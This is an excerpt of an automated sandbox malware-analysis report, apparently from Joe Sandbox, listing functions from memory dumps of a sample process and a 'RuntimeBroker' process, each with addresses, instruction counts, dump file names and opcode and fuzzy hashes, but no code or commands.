                        • Opcode ID: 873994b5c40817ffc23505ceeca4e69e9abe00b51f900beec2d659ab2f1f963a
                        • Instruction ID: 609e8144602e6a33aa7520ea4fc79efaa44e7086ccd6f3339b113fb044f1373c
                        • Opcode Fuzzy Hash: 873994b5c40817ffc23505ceeca4e69e9abe00b51f900beec2d659ab2f1f963a
                        • Instruction Fuzzy Hash: B6114C02F1F19B9EFA7937D428320B895C05F45760F1B21BBD45E871E2DCEC2A811682
                        Function 00007FFD9BAC32D0 Relevance: .1, Instructions: 58COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5b4a394d0afd376e75dd57ba3fee9c8f643c62627c3b561bbe1e085ca597ffdb
                        • Instruction ID: a050dd0daf2270630dc7511d6c493be1f7f48ae1ffa49e93f5296b568fb7d3a4
                        • Opcode Fuzzy Hash: 5b4a394d0afd376e75dd57ba3fee9c8f643c62627c3b561bbe1e085ca597ffdb
                        • Instruction Fuzzy Hash: 4A116031E0954E8FDF99DB98C4A16F8B7A1FF68310F0401BAD04EDB2A2DB356940CB01
                        Function 00007FFD9BAB1860 Relevance: .1, Instructions: 57COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b45b4c3f8e0cdc4ea395ad0fa41ed50ad31c81cccaac04da1d94d2b1a0a44056
                        • Instruction ID: 58b4e20129f0a46b1bc3f1342f8ceeec300cd36b21deaa03e82436322f0eff0c
                        • Opcode Fuzzy Hash: b45b4c3f8e0cdc4ea395ad0fa41ed50ad31c81cccaac04da1d94d2b1a0a44056
                        • Instruction Fuzzy Hash: F0111731A2892D9FDF90EF98D854AEEB7F1FF58310F000576E419E3295DB74A9508B90
                        Function 00007FFD9BAC67CC Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 99aa03bf7d511206a00725b440e061fd23c9ef7bd7422333c45b730614fd5329
                        • Instruction ID: a59f6b135aa6edb5670787680d7ce4a4c3a1ab42c7cf77ee1afd4b1fd73f4424
                        • Opcode Fuzzy Hash: 99aa03bf7d511206a00725b440e061fd23c9ef7bd7422333c45b730614fd5329
                        • Instruction Fuzzy Hash: 1D113574A1965D8FDF50EF9CD8556EEB7F0FF58300F000576E909E3250DA74A9108B81
                        Function 00007FFD9BAC67D0 Relevance: .1, Instructions: 52COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 24db5041fa8690452568a8e7b2643c09ee95ae29044ef83cf8b248dff1069636
                        • Instruction ID: b733cfc22327c1ce9dad483eeb23c7585678ef6741417bed78b06eea3db6be5e
                        • Opcode Fuzzy Hash: 24db5041fa8690452568a8e7b2643c09ee95ae29044ef83cf8b248dff1069636
                        • Instruction Fuzzy Hash: F1010274A1861D8FDF50EF98D855AEEBBF0FB58304F01056AE909E3250DA74A9108B91
                        Function 00007FFD9BABB5C5 Relevance: .1, Instructions: 52COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 985c17cb0a568aa190949449aebd7a3518826e6b1e1a15d562d85457876fac35
                        • Instruction ID: 0908dbe20fe87d01720f7accb2e138566aacd9580540db2978bb906d886a9f35
                        • Opcode Fuzzy Hash: 985c17cb0a568aa190949449aebd7a3518826e6b1e1a15d562d85457876fac35
                        • Instruction Fuzzy Hash: C7018831B1D91C4FDB58E7A8E8A66ECB7E0FF45324F450179E01EC22D3DE2559518740
                        Function 00007FFD9BAB5054 Relevance: .0, Instructions: 49COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0a1f8cf7765aa46f305e388601a4503f2f9577aed9e80a6b6529bb93d2b0d3c1
                        • Instruction ID: 4631ba04d52dc4bab8e41179acc6bf6425c9197f07c8e3996ededdc6a65ab8a1
                        • Opcode Fuzzy Hash: 0a1f8cf7765aa46f305e388601a4503f2f9577aed9e80a6b6529bb93d2b0d3c1
                        • Instruction Fuzzy Hash: 85119270E1492C8FDBA4EB68D855BECB7B1FF58301F4041AAD41DE32A6DE306981CB40
                        Function 00007FFD9BAC36CE Relevance: .0, Instructions: 46COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4c9627195ef328d86fc1838c8991c6e0afd3b4ce9ee4479eafc13a08f062ef12
                        • Instruction ID: d861b7422c76a64dfc636d41e0987689a788409ad50928b33abd17bc66f5e507
                        • Opcode Fuzzy Hash: 4c9627195ef328d86fc1838c8991c6e0afd3b4ce9ee4479eafc13a08f062ef12
                        • Instruction Fuzzy Hash: 76F0D131A4F2CA5FD722ABB088625B93FA0AF02204F1500F6D049CB1A2C9BD264A8761
                        Function 00007FFD9BAB5317 Relevance: .0, Instructions: 45COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5b8d6ea14d95ecb16738d2f4ad37f4f251b42817e37dba37780a795ef873c75b
                        • Instruction ID: 7c252ec05662dbf86d8e29c2db7a5f9c1ab3dcdeb0e939ac54618559a6d85f53
                        • Opcode Fuzzy Hash: 5b8d6ea14d95ecb16738d2f4ad37f4f251b42817e37dba37780a795ef873c75b
                        • Instruction Fuzzy Hash: 8D017C31E0992D8EDFA4EB6898657EDB3B1FF18300F5000BAC05CE3252CE741A858F01
                        Function 00007FFD9BABD0F8 Relevance: .0, Instructions: 45COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 28cb2e92ead1166c848b1f29f733eda4abadfcf3b3358e3e9aa9f60735d86dee
                        • Instruction ID: 9f32bc1996f63f50237d27775fcce1b2e5539720704d67683fa0e38db5e28a10
                        • Opcode Fuzzy Hash: 28cb2e92ead1166c848b1f29f733eda4abadfcf3b3358e3e9aa9f60735d86dee
                        • Instruction Fuzzy Hash: 3001D431719A0D8BD768EB28D05099573A2FF48304B400A7DD05EC75A6DE39F945CB80
                        Function 00007FFD9BAC3659 Relevance: .0, Instructions: 44COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9eec8706a9105b08c5654516aa55552a1e79b9a9376b90138a90cc4a326383e5
                        • Instruction ID: b2986f63b2ad4e8676c3e2e69eec8e8409252c3b76d7eed7575e51f51bfe9dee
                        • Opcode Fuzzy Hash: 9eec8706a9105b08c5654516aa55552a1e79b9a9376b90138a90cc4a326383e5
                        • Instruction Fuzzy Hash: 38014F30A0890C8FCFA9EF58C865BE5B7B0FBAD315F0401A9D00DD7291C6759A80CB41
                        Function 00007FFD9BAC3658 Relevance: .0, Instructions: 43COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6f77734cda1279071ff12e2ab4198bd801413261a073429339132f3ae81b152c
                        • Instruction ID: 65354b07e1f8b1cde64c6aa2e1afb119ee1ec310543794e29337d30360976994
                        • Opcode Fuzzy Hash: 6f77734cda1279071ff12e2ab4198bd801413261a073429339132f3ae81b152c
                        • Instruction Fuzzy Hash: 13014F30A0890CCFCF99EF58C869BE8B7B0FBAC315F0401A9D40DD7291CA759A80CB41
                        Function 00007FFD9BABCAC6 Relevance: .0, Instructions: 42COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 85b388ddc2b703efbc7a8d7913b2d0a978b219b069f101278d51b79990313cb2
                        • Instruction ID: 5930a04a3742dc889c9c800a624c9756c54c4b4445b5274b14b0ca07f939f06d
                        • Opcode Fuzzy Hash: 85b388ddc2b703efbc7a8d7913b2d0a978b219b069f101278d51b79990313cb2
                        • Instruction Fuzzy Hash: 78F04921B19D0D4FC674EB68D061AAA73D1EF48340F404A7AD05EC71E6DD38B8458740
                        Function 00007FFD9BAC41E6 Relevance: .0, Instructions: 42COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ec8da9553310ad27d84b6ab92ea66ff8b431149993cdb7530667423a57e183cd
                        • Instruction ID: 3b5a563ee84f723d53a1785000ef4b0e503806b7d0d143bdac3c5397e2bedd74
                        • Opcode Fuzzy Hash: ec8da9553310ad27d84b6ab92ea66ff8b431149993cdb7530667423a57e183cd
                        • Instruction Fuzzy Hash: 6CF0D121B19E0E4BD7A4FB68C461AA673E1EF68250B400A7DD04EC71E6EE38B8458780
                        Function 00007FFD9BABCF77 Relevance: .0, Instructions: 41COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c92ab17ca58e4f7ebd8805825eee25577c97dffd8502b1cd57269da2d6f015b3
                        • Instruction ID: 617544a3e23fe014d6ee2ced5d8a68404333e3f25bd8fbb9b9ae3a2f391adfca
                        • Opcode Fuzzy Hash: c92ab17ca58e4f7ebd8805825eee25577c97dffd8502b1cd57269da2d6f015b3
                        • Instruction Fuzzy Hash: 8FF0FF32305A0E8BE329975CE4607D53292EBC4320F06067AC86EC73A5DDBEE5C28740
                        Function 00007FFD9BABB1AA Relevance: .0, Instructions: 41COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3b79c2fe383ec3791164dbf5fd8fd5084c3525f593507479bd0f72473fcef275
                        • Instruction ID: 2f4d2171a239735331e130db87d0f3dedb89a1dcfe303ccf09250c8f318e18e1
                        • Opcode Fuzzy Hash: 3b79c2fe383ec3791164dbf5fd8fd5084c3525f593507479bd0f72473fcef275
                        • Instruction Fuzzy Hash: BDF02D2290F6994FDB269F799CB14D53BA0DF52104B4A02F7C455CF0D7EC542989C741
                        Function 00007FFD9BABC957 Relevance: .0, Instructions: 39COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f72872f98d2e59e336e0a479f659626598ee3952eae174733e431549105a9e5d
                        • Instruction ID: 949d67fe3cf150e9e2f4cb79e9cb9dfef311e229554f7cc6846517ad125f2930
                        • Opcode Fuzzy Hash: f72872f98d2e59e336e0a479f659626598ee3952eae174733e431549105a9e5d
                        • Instruction Fuzzy Hash: 26F0F03230991E4EF7259B8CE865BE53386DBD4320F460639D46DC33E5EDADEAC28640
                        Function 00007FFD9BAC4077 Relevance: .0, Instructions: 39COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ab7afdc053ef837fb25fe12c7de3d9ea434dd5dcef05041d20bdabc98a1a2bbd
                        • Instruction ID: b2ab6137507467f404501803c308e4b7f49936893848b8b1e91c8f8e72092b6e
                        • Opcode Fuzzy Hash: ab7afdc053ef837fb25fe12c7de3d9ea434dd5dcef05041d20bdabc98a1a2bbd
                        • Instruction Fuzzy Hash: FDF09632749A0E4EE325A74CD8617E52296DBD4320F464639D45DC33E5DDADE5C28340
                        Function 00007FFD9BAC2CAC Relevance: .0, Instructions: 37COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 09f6efc45fa58910a37add30befa2990ea4bd664bf8a997cbf9a318c7c45f2a4
                        • Instruction ID: e0b6d10ada55927382d9093df2525f0bc19d08f9d4683feec5e0e1c1fee5856f
                        • Opcode Fuzzy Hash: 09f6efc45fa58910a37add30befa2990ea4bd664bf8a997cbf9a318c7c45f2a4
                        • Instruction Fuzzy Hash: F7F0BE71E1FB4E5EEBB0BBE848695FA2AE0EF59A40F01013BE40CD3161EEB519418241
                        Function 00007FFD9BAC336B Relevance: .0, Instructions: 34COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7b72a144a574810cc2226e3ba7cf072b5cc16da94341ca61fc10c7fb38b6167b
                        • Instruction ID: e517b25b5f9f403972a78987d989351fd6acf9ac47a1d40c6b67b9f336f16615
                        • Opcode Fuzzy Hash: 7b72a144a574810cc2226e3ba7cf072b5cc16da94341ca61fc10c7fb38b6167b
                        • Instruction Fuzzy Hash: 81F01270E1DA5D8EDBA8EF448865BB4B6A1EB69310F0001F9904DD7392CE7429848B02
                        Function 00007FFD9BAC3337 Relevance: .0, Instructions: 33COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f20202e4e042fd717c895827b86a9404ef0a46fa942442ae25cce2d246587595
                        • Instruction ID: 0ad26c241f48ef4755e54e9288a0b54323d8b036e4c532fcd415430182b5fd0b
                        • Opcode Fuzzy Hash: f20202e4e042fd717c895827b86a9404ef0a46fa942442ae25cce2d246587595
                        • Instruction Fuzzy Hash: 41F0E474A1991D8FDFA8EF58C495AACB7F1FB68305F20415DC00EE7261CA71A981DF40
                        Function 00007FFD9BAB08B1 Relevance: .0, Instructions: 31COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 60757ba9d283989b744a415bef3330f96d28ffceee1e071e3f8d41fbc6a912e5
                        • Instruction ID: 1d9fb1bc4d5e1d515d90df146505c20e19121e4763472688ebeaa8ef6125204a
                        • Opcode Fuzzy Hash: 60757ba9d283989b744a415bef3330f96d28ffceee1e071e3f8d41fbc6a912e5
                        • Instruction Fuzzy Hash: A2E0923294F28D4BE7356BA19DA51E87B20FF42700F4716F6D06C450E3DA98A6588B41
                        Function 00007FFD9BAC0518 Relevance: .0, Instructions: 20COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dbff91e8487740810358b3a0ccca3217ba67f2cbeb5b0cc98a82ac673286b7c9
                        • Instruction ID: 0d23ab46685ec9afde6aa9af33e6df471f832b370de7032160bc22b34e367dae
                        • Opcode Fuzzy Hash: dbff91e8487740810358b3a0ccca3217ba67f2cbeb5b0cc98a82ac673286b7c9
                        • Instruction Fuzzy Hash: 37E01210F6E90E8BD978B7AC80A417822A1BF48704FB9C174D40DC7195E96DEE469308
                        Function 00007FFD9BAC2A2C Relevance: .0, Instructions: 18COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f13506b7ae6fb41b38e8e91a274ed9f0d2072a8c2296423ffeb20426e8027450
                        • Instruction ID: 99b510bd5ec5235bf2bc1bb185eae0ee7648c3f847b135b5a3057058be2b3114
                        • Opcode Fuzzy Hash: f13506b7ae6fb41b38e8e91a274ed9f0d2072a8c2296423ffeb20426e8027450
                        • Instruction Fuzzy Hash: D3D0A712F1DE4A0AEBB873E924614B179D0DF5821070605BDE45FC71DAFC986D944341
                        Function 00007FFD9BABFA5D Relevance: .0, Instructions: 7COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 28b296ac05fe057ee38e3f3ccb0b5c66d8a7745c61b24d1774bfb17ae809874f
                        • Instruction ID: 98faf7177d432932084065269f6b1aabf976c380fc165a7d04b74c179b2954df
                        • Opcode Fuzzy Hash: 28b296ac05fe057ee38e3f3ccb0b5c66d8a7745c61b24d1774bfb17ae809874f
                        • Instruction Fuzzy Hash: 82B092B0E1F06F40E83C23C0443107820006F04310EAA2138C42E011A25CCF23802956
                        Function 00007FFD9BAC3BF0 Relevance: .0, Instructions: 4COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.1829225063.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ffd9bab0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fc22fa9f01ea3e618204c8133a14f0c37d03671c0a626eb4b8f9404a99624c17
                        • Instruction ID: b6d1930222c8f72b80d7a49c35fef7376094e23897ddbc5cb5fc5f301dacd675
                        • Opcode Fuzzy Hash: fc22fa9f01ea3e618204c8133a14f0c37d03671c0a626eb4b8f9404a99624c17
                        • Instruction Fuzzy Hash: 32A00205F0D91682F679329410364FD51911F44700E151479E01F521E7CD5C2609104B

                        Executed Functions

                        Function 00007FFD9BAA2010 Relevance: 15.3, Strings: 11, Instructions: 1544COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.1817335585.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffd9baa0000_RuntimeBroker.jbxd
                        Similarity
                        • API ID:
                        • String ID: "$[$[$\$]$]$u${${$}$}
                        • API String ID: 0-3490533229
                        • Opcode ID: 7abdde6141c4b6102732dd4b8e9f9a4c750ab3995e5ae6439cc01fb178594249
                        • Instruction ID: a3df698850311590d83d2b7e00385dcd1f1a977792f3efbb29db22993f3a50fc
                        • Opcode Fuzzy Hash: 7abdde6141c4b6102732dd4b8e9f9a4c750ab3995e5ae6439cc01fb178594249
                        • Instruction Fuzzy Hash: 7FD2C570E1962D8FDBA8DF18C894BA9B7B1FF59301F5041EAD01DE7295CA74AA81CF40
                        Function 00007FFD9BAA0600 Relevance: 7.0, Strings: 5, Instructions: 771COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.1817335585.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffd9baa0000_RuntimeBroker.jbxd
                        Similarity
                        • API ID:
                        • String ID: "$"$-$[${
                        • API String ID: 0-3019564589
                        • Opcode ID: 0a6c2039ceb0e9bb05d64778d619e76e1af57f26f1c9a603721a44a42dc11023
                        • Instruction ID: daf33da57382e4ad01cd03a7a261c3ed574422cc11c4699664c84143a13f0010
                        • Opcode Fuzzy Hash: 0a6c2039ceb0e9bb05d64778d619e76e1af57f26f1c9a603721a44a42dc11023
                        • Instruction Fuzzy Hash: 3E62D870E1966D8FDBA4EF68C894BA8B7F1FF58301F5045A9E04DE7295CA349A81CF40
                        Function 00007FFD9BAA18F8 Relevance: .4, Instructions: 370COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1817335585.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffd9baa0000_RuntimeBroker.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 87dc42ed63deaa3c29e3d239606a5bbce767b8c096533efa104bab73d8cf0e10
                        • Instruction ID: 5d08e666d023c31f0f1aaedcad6ef7a85825453c42f5dfc82edf6e4d1f9a0b65
                        • Opcode Fuzzy Hash: 87dc42ed63deaa3c29e3d239606a5bbce767b8c096533efa104bab73d8cf0e10
                        • Instruction Fuzzy Hash: 6CD14D71E1965D8FDBA8EF58C8A4BACB7A2FF69304F4041B9D00DD72D2DA746980CB10
                        Function 00007FFD9BAA3530 Relevance: .3, Instructions: 326COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1817335585.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffd9baa0000_RuntimeBroker.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eb8665bfb9bf545a81ec3a14b46477d7e87291ba3d8f27e9db158a1bbd8109b9
                        • Instruction ID: 545fc131f0981b3be36b3cb3641dda18425e79e9f33a3c699136da502d0804cb
                        • Opcode Fuzzy Hash: eb8665bfb9bf545a81ec3a14b46477d7e87291ba3d8f27e9db158a1bbd8109b9
                        • Instruction Fuzzy Hash: 4EC14970E1A65D8FDB68DF98C860ABDB7F2FF19301F110179D009A72A1CB79A941CB51
                        Function 00007FFD9BAA4205 Relevance: .3, Instructions: 288COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1817335585.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffd9baa0000_RuntimeBroker.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e79a4b12fc77171a3676f66d2361739eafd8b5cef4fc4977c233b28367ee1332
                        • Instruction ID: 1ec72c75cd8749065a79d3763439a91862d7626c313a913a602fcb2372e3e79d
                        • Opcode Fuzzy Hash: e79a4b12fc77171a3676f66d2361739eafd8b5cef4fc4977c233b28367ee1332
                        • Instruction Fuzzy Hash: 02B1EA70E08A5D8FDB94EF68C894BA8B7F1FF58310F1045A9E05DE7296CA34A981CF40
                        Function 00007FFD9BAA0CB1 Relevance: .3, Instructions: 251COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.1817335585.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ffd9baa0000_RuntimeBroker.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3d0dfa6799d63e56533412072375108ace87e160fb3dc5ac9677f816c4fb63c2
                        • Instruction ID: 9d2dea90f08961879778508fe31fe7fae69c23e00684a3f9d27f3ba9f5b08367
                        • Opcode Fuzzy Hash: 3d0dfa6799d63e56533412072375108ace87e160fb3dc5ac9677f816c4fb63c2
                        • Instruction Fuzzy Hash: F1A16170E1991D8FDBA5EF18C895AE9B7B1FF58305F5005E5A00DE72A5CA34AE81CF40
                        Function 00007FFD9BAA09D9 Relevance: .2, Instructions: 250COMMON
                        Download Yara Rule
                        Memory Dump Source
